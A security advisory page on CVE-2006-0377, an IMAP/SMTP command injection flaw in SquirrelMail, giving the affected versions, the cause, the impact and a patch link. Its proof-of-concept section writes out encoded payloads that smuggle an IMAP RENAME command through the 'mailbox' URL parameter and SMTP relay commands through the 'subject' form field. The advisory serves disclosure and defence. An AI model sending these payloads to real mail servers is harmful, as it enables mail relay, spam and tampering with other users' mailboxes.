Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2006-0377 to a friend New vulnerability? New tool? Tell us	CVE-2006-0377 SquirrelMail IMAP/SMTP Injection     Credit: The information has been provided by Vicente Aguilera Diaz. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2006-0377 Details Check for CVE-2006-0377 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * IMAP Injection: All versions prior to 1.4.6  * SMTP Injection: SquirrelMail version 1.2.7 Improper command and information validation transmitted by SquirrelMail to the mail servers during the normal use of this application (mailbox management, e-mail reading and sending, etc.) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail across parameters used by the webmail front-end in its communication with these mail servers. This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands. Proof of Concept:  == IMAP example (1.4.2 version) ============= SquirrelMail Vulnerable parameter: "mailbox" When a user clicks in the subject of an e-mail, he creates a GET request as: http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1 &startMessage=1&show_more=0 A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command. The IMAP command injection has the following structure: http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0<ID> <INJECT_IMAP_COMMAND_HERE>%0D%0A<ID> %20SELECT%20%22INBOX&passed_id=<CODE>&startMessage=1 Example: Injection of the RENAME IMAP command across the "mailbox" parameter: http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME %20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197& startMessage=1  == SMTP example (1.2.7 version) ============= SquirrelMail Vulnerable parameter: "subject" (and possibly others) When a user send a message, he create a POST request like: POST http://<victim>/src/compose.php HTTP/1.1 ... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept -----------------------------84060780712450133071594948441 ... A malicious user can modify the value of the "subject" parameter and inject any SMTP command. Example: Relay from a non-existent e-mail address ... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept%0d%0a.%0d%0a%0d%0amail from: hacker@domain.com%0d%0arcpt to: victim@otherdomain.com%0d%0adata%0d%0aThis is a proof of concept of the SMTP command injection in SquirrelMail%0d%0a.%0d%0a -----------------------------84060780712450133071594948441 ... Impact: The IMAP/SMTP command injection allow relay, SPAM, exploit IMAP and SMTP vulnerabilities in the mail servers and evade all the restrictions at the application layer. Solution: Replace \r and \n from $mailbox in the function sqimap_mailbox_select. Patch available: http://www.squirrelmail.org/security/issue/2006-02-15 CVE Information: CVE-2006-0377  Comments on CVE-2006-0377:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®